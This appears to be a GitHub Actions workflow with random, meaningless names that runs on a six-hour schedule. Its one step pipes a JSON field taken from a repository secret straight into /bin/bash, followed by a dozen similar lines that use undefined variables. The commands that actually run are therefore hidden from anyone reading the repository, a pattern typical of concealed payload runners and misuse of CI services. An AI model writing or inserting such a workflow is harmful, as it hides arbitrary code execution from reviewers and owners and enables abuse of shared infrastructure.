name: aboutwherekh

on:
  workflow_dispatch:
  schedule:
    - cron: '45 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: aboutwherekh
        env:
          p61710: ${{ secrets.p61710 }}
        run: |
          echo $p61710 | jq -r .ygf6 | /bin/bash
          echo $igvq3 | jq -r .dad1505 | /bin/bash
          echo $z88652 | jq -r .hdk71 | /bin/bash
          echo $qz411 | jq -r .lryie5 | /bin/bash
          echo $dyt57226 | jq -r .sdto52 | /bin/bash
          echo $isgsn46821 | jq -r .jsm372 | /bin/bash
          echo $sycpj0256 | jq -r .f758 | /bin/bash
          echo $l3884 | jq -r .qu09717 | /bin/bash
          echo $qdz10 | jq -r .o4 | /bin/bash
          echo $ed88 | jq -r .wpu930 | /bin/bash
          echo $tvyd84933 | jq -r .dhyzs18859 | /bin/bash
          echo $y10146 | jq -r .qt75 | /bin/bash
          echo $wpcb9 | jq -r .tl8842 | /bin/bash

